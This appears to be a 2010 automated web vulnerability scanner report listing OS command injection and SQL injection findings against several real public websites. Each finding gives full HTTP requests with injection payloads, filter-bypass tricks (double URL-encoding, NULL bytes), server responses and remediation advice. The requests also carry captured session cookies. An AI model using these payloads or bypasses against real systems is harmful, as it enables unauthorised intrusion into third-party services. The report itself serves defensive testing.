Operating system command injection vulnerabilities arise when an application incorporates user-controllable data into a command that is processed by a shell command interpreter. If the user data is not strictly validated, an attacker can use shell metacharacters to modify the command to be executed, and inject arbitrary further commands that will be executed by the server.
OS command injection vulnerabilities are usually very serious and may lead to compromise of the server hosting the application, or of the application's own data and functionality. The exact potential for exploitation may depend upon the security context in which the command is executed, and the privileges which this context has regarding sensitive resources on the server.
Issue remediation
If possible, applications should avoid incorporating user-controllable data into operating system commands. In almost every situation, there are safer alternative methods of performing server-level tasks, which cannot be manipulated to perform additional commands than the one intended.
If it is considered unavoidable to incorporate user-supplied data into operating system commands, the following two layers of defense should be used to prevent attacks:
The user data should be strictly validated. Ideally, a whitelist of specific accepted values should be used. Otherwise, only short alphanumeric strings should be accepted. Input containing any other data, including any conceivable shell metacharacter or whitespace, should be rejected.
The application should use command APIs that launch a specific process via its name and command-line parameters, rather than passing a command string to a shell interpreter that supports command chaining and redirection. For example, the Java API Runtime.exec and the ASP.NET API Process.Start do not support shell metacharacters. This defense can mitigate the impact of an attack even in the event that an attacker circumvents the input validation defenses.
The REST URL parameter 1 appears to be vulnerable to OS command injection attacks. It is possible to use the ampersand character (&) to inject arbitrary OS commands and retrieve the output in the application's responses.
The payload %26echo%207244131218a72ce9%2042240a205b35cc82%26 was submitted in the REST URL parameter 1. The application's response appears to contain the output from the injected command, indicating that the command was executed.
Request
GET /downloads%26echo%207244131218a72ce9%2042240a205b35cc82%26/details.aspx HTTP/1.1 Host: www.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 400 Page not available Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 VTag: 27984042600000000 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sun, 07 Nov 2010 00:53:47 GMT Content-Length: 23911
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en"lang="en"><he ...[SNIP]... <a href="http://search.microsoft.com/Results.aspx?mkt=en-US&qsc0=0&q=downloads+ecko+7244131218a72ce9+42240a205b35cc82+details+aspx">downloads ecko 7244131218a72ce9 42240a205b35cc82 details aspx</a> ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to OS command injection attacks. It is possible to use the ampersand character (&) to inject arbitrary OS commands and retrieve the output in the application's responses.
The payload %26echo%2060a2c32dddfb8586%206f05be19f3af2e55%26 was submitted in the REST URL parameter 2. The application's response appears to contain the output from the injected command, indicating that the command was executed.
Request
GET /downloads/details.aspx%26echo%2060a2c32dddfb8586%206f05be19f3af2e55%26 HTTP/1.1 Host: www.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Page not available Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 VTag: 279156141400000000 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sun, 07 Nov 2010 00:54:41 GMT Content-Length: 23918
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en"lang="en"><he ...[SNIP]... <a href="http://search.microsoft.com/Results.aspx?mkt=en-US&qsc0=0&q=downloads+details+aspx+ecko+60a2c32dddfb8586+6f05be19f3af2e55">downloads details aspx ecko 60a2c32dddfb8586 6f05be19f3af2e55</a> ...[SNIP]...
2. SQL injectionpreviousnext There are 14 instances of this issue:
SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Issue remediation
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defense is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defense is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defense may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defense to be bypassed.
Another often cited defense is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /blog'%20and%201%3d1--%20/2010/11/06/exploit-next-generation-sql-fingerprint-esf-...-ms-sql-server-fingerprinting-tool/ HTTP/1.1 Host: deepquest.code511.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>403 Forbidden</title> </head><body> <h1>Forbidden</h1> <p>You don't have permission to access /blog' and 1=1-- /2010/11/06/exploit-next-generation-sql-fingerprint-esf-...-ms-sql-server-fingerprinting-tool/ on this server.</p> </body></html>
Request 2
GET /blog'%20and%201%3d2--%20/2010/11/06/exploit-next-generation-sql-fingerprint-esf-...-ms-sql-server-fingerprinting-tool/ HTTP/1.1 Host: deepquest.code511.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Set-Cookie: 90plan=R3938921532; path=/; expires=Tue, 09-Nov-2010 13:19:04 GMT Date: Sun, 07 Nov 2010 00:58:22 GMT Server: Apache/2.2.X (OVH) Vary: Accept-Encoding Content-Length: 308 Connection: close Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /blog' and 1=2-- /2010/11/06/exploit-next-generation-sql-fingerprint-esf-...-ms-sql-server-fingerprinting-tool/ was not found on this server.</p> </body></html>
The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 5. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /blog/2010/11/06/exploit-next-generation-sql-fingerprint-esf-'%20and%201%3d1--%20...-ms-sql-server-fingerprinting-tool/ HTTP/1.1 Host: deepquest.code511.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>403 Forbidden</title> </head><body> <h1>Forbidden</h1> <p>You don't have permission to access /blog/2010/11/06/exploit-next-generation-sql-fingerprint-esf-' and 1=1-- ...-ms-sql-server-fingerprinting-tool/ on this server.</p> </body></html>
Request 2
GET /blog/2010/11/06/exploit-next-generation-sql-fingerprint-esf-'%20and%201%3d2--%20...-ms-sql-server-fingerprinting-tool/ HTTP/1.1 Host: deepquest.code511.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Set-Cookie: 90plan=R2613683612; path=/; expires=Tue, 09-Nov-2010 13:19:02 GMT Date: Sun, 07 Nov 2010 01:04:50 GMT Server: Apache/2.2.X (OVH) X-Powered-By: PHP/4.4.9 X-Pingback: http://deepquest.code511.com/blog/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Sun, 07 Nov 2010 01:04:51 GMT Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 10047
<script type="text/javascript">//<![CDATA[ // Google Analytics for WordPress by Yoast v4.06 | http://yoast.com/wordpress/google-analytics/ var _gaq = _gaq || []; _gaq.push(['_setAccount','UA-209501-1']); _gaq.push(['_trackPageview','/404.html?page=' + doc ...[SNIP]...
2.3. http://espn.go.com/espn/fp/pollDataGenUniversal [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://espn.go.com
Path:
/espn/fp/pollDataGenUniversal
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 11430324'%20or%201%3d1--%20 and 11430324'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
HTTP/1.1 200 OK Cache-Control: max-age=15 Date: Sat, 06 Nov 2010 14:18:19 GMT Content-Type: text/html; charset=utf-8 Last-Modified: Sat, 06 Nov 2010 14:18:19 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN18 Cache-Expires: Sat, 06 Nov 2010 14:20:29 GMT Content-Length: 647 X-UA-Compatible: IE=EmulateIE7
HTTP/1.1 200 OK Cache-Control: max-age=15 Date: Sat, 06 Nov 2010 14:18:03 GMT Content-Type: text/html; charset=utf-8 Last-Modified: Sat, 06 Nov 2010 14:18:03 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN31 Cache-Expires: Sat, 06 Nov 2010 14:20:18 GMT Content-Length: 668 X-UA-Compatible: IE=EmulateIE7
2.4. http://topsy.com/link [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://topsy.com
Path:
/link
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /link?1%20and%201%3d1--%20=1 HTTP/1.1 Host: topsy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 200 OK Set-Cookie: utid=1b53e27422c045ecfea18a5b4afb9f7d; Path=/; Version=1; Domain=.topsy.com Set-Cookie: topsy_session=646541ab67596649e143fb725a5ce81a613d22ce; path=/; expires=Sat, 13-Nov-2010 17:22:08 GMT; HttpOnly Content-Type: text/html; charset=utf-8 Expires: Sat, 06 Nov 2010 10:27:08 -0700 Content-Length: 0 Connection: close Date: Sat, 06 Nov 2010 17:22:08 GMT Server: lighttpd/1.4.26
Request 2
GET /link?1%20and%201%3d2--%20=1 HTTP/1.1 Host: topsy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Expires: Sat, 06 Nov 2010 10:27:09 -0700 Set-Cookie: topsy_session=21a273ef478b6f2b5c0c2160b7a80a514b9af8ae; path=/; expires=Sat, 13-Nov-2010 17:22:09 GMT; HttpOnly Content-Length: 0 Connection: close Date: Sat, 06 Nov 2010 17:22:09 GMT Server: lighttpd/1.4.26
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /top'%20and%201%3d1--%20 HTTP/1.1 Host: topsy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 200 OK Set-Cookie: utid=6c97d63f6c53fa548d800ef6752a5ea7; Path=/; Version=1; Domain=.topsy.com Set-Cookie: topsy_session=5c1b89711f0266bb3df75c077754ff78efa724ff; path=/; expires=Sat, 13-Nov-2010 17:22:56 GMT; HttpOnly Content-Length: 13380 Content-Type: text/html; charset=utf-8 Expires: Sat, 06 Nov 2010 10:27:56 -0700 Connection: close Date: Sat, 06 Nov 2010 17:22:56 GMT Server: lighttpd/1.4.26
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title> Twitter Trackbacks for
<script type="text/javascript" id="topsy_global_settings"> var topsy_style = "small";
...[SNIP]...
Request 2
GET /top'%20and%201%3d2--%20 HTTP/1.1 Host: topsy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Content-Length: 13380 Content-Type: text/html; charset=utf-8 Expires: Sat, 06 Nov 2010 10:27:56 -0700 Set-Cookie: topsy_session=8f7823e982913be003f29528e10af98f9572a196; path=/; expires=Sat, 13-Nov-2010 17:22:56 GMT; HttpOnly Connection: close Date: Sat, 06 Nov 2010 17:22:56 GMT Server: lighttpd/1.4.26
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title> Twitter Trackbacks for
The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payloads 17886169'%20or%201%3d1--%20 and 17886169'%20or%201%3d2--%20 were each submitted in the Referer HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /top HTTP/1.1 Host: topsy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=17886169'%20or%201%3d1--%20
Response 1
HTTP/1.1 200 OK Set-Cookie: utid=4e58cccbbde70f24f775bdb79cd47f7f; Path=/; Version=1; Domain=.topsy.com Set-Cookie: topsy_session=862148fb4ac5e972ca6861083d3ab3e49ed00a84; path=/; expires=Sat, 13-Nov-2010 17:22:35 GMT; HttpOnly Content-Length: 13102 Content-Type: text/html; charset=utf-8 Expires: Sat, 06 Nov 2010 10:27:35 -0700 Connection: close Date: Sat, 06 Nov 2010 17:22:35 GMT Server: lighttpd/1.4.26
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title> Twitter Trackbacks for
<script type="text/javascript" id="topsy_global_settings"> var topsy_style = "small"; var topsy_nick = "TopsyRT"; v ...[SNIP]...
Request 2
GET /top HTTP/1.1 Host: topsy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=17886169'%20or%201%3d2--%20
Response 2
HTTP/1.1 200 OK Content-Length: 13102 Content-Type: text/html; charset=utf-8 Expires: Sat, 06 Nov 2010 10:27:36 -0700 Set-Cookie: topsy_session=dd03205bd523bf59969d031d45031be51ffb538f; path=/; expires=Sat, 13-Nov-2010 17:22:36 GMT; HttpOnly Connection: close Date: Sat, 06 Nov 2010 17:22:37 GMT Server: lighttpd/1.4.26
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title> Twitter Trackbacks for
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /b%2527/ss/wdgesp360,wdgespge/1/H.21/s24528802135027 HTTP/1.1 Host: w88.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A4%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A4%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; s_sess=%20s_ppv%3D83%3B%20s_sq%3D%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B; fsr.a=1289020670509; CRBLM_LAST_UPDATE=1289019281; mbox=session#1289020509579-435223#1289022526|check#true#1289020726; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020671418%7C1383628671418%3B%20s_c24_s%3DFirst%2520Visit%7C1289022471418%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022471431%3B; RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; CRBLM=CBLM-001:; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; SEEN2=cAMLBtEOcAMLBtEOcAMLBtEO:;
Response 1
HTTP/1.1 404 Not Found Date: Sun, 07 Nov 2010 00:43:55 GMT Server: Omniture DC/2.0.0 Content-Length: 437 Content-Type: text/html; charset=iso-8859-1 Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /b%27/ss/wdgesp360,wdgespge/1/H.21/s24528802135027 wa ...[SNIP]... <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> ...[SNIP]...
Request 2
GET /b%2527%2527/ss/wdgesp360,wdgespge/1/H.21/s24528802135027 HTTP/1.1 Host: w88.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A4%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A4%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; s_sess=%20s_ppv%3D83%3B%20s_sq%3D%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B; fsr.a=1289020670509; CRBLM_LAST_UPDATE=1289019281; mbox=session#1289020509579-435223#1289022526|check#true#1289020726; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020671418%7C1383628671418%3B%20s_c24_s%3DFirst%2520Visit%7C1289022471418%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022471431%3B; RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; CRBLM=CBLM-001:; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; SEEN2=cAMLBtEOcAMLBtEOcAMLBtEO:;
Response 2
HTTP/1.1 404 Not Found Date: Sun, 07 Nov 2010 00:43:55 GMT Server: Omniture DC/2.0.0 xserver: www600 Content-Length: 0 Content-Type: text/html Connection: close
The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /b/ss/wdgespcom,wdgespge/1/H.21%00'/s2139151592738 HTTP/1.1 Host: w88.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020213231%7C1383628213231%3B%20s_c24_s%3DFirst%2520Visit%7C1289022013231%3B%20s_gpv_pn%3Dsoccernet%253Afrontpage%253Afrontpage%7C1289022013456%3B; RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; s_sess=%20s_ppv%3D83%3B%20s_sq%3D%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1289019281; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17;
Response 1
HTTP/1.1 404 Not Found Date: Sat, 06 Nov 2010 17:28:33 GMT Server: Omniture DC/2.0.0 Content-Length: 418 Content-Type: text/html; charset=iso-8859-1 Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /b/ss/wdgespcom,wdgespge/1/H.21 was not found on this ...[SNIP]... <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> ...[SNIP]...
Request 2
GET /b/ss/wdgespcom,wdgespge/1/H.21%00''/s2139151592738 HTTP/1.1 Host: w88.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020213231%7C1383628213231%3B%20s_c24_s%3DFirst%2520Visit%7C1289022013231%3B%20s_gpv_pn%3Dsoccernet%253Afrontpage%253Afrontpage%7C1289022013456%3B; RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; s_sess=%20s_ppv%3D83%3B%20s_sq%3D%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1289019281; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17;
Response 2
HTTP/1.1 404 Not Found Date: Sat, 06 Nov 2010 17:28:33 GMT Server: Omniture DC/2.0.0 xserver: www404 Content-Length: 0 Content-Type: text/html Connection: close
The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 6, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
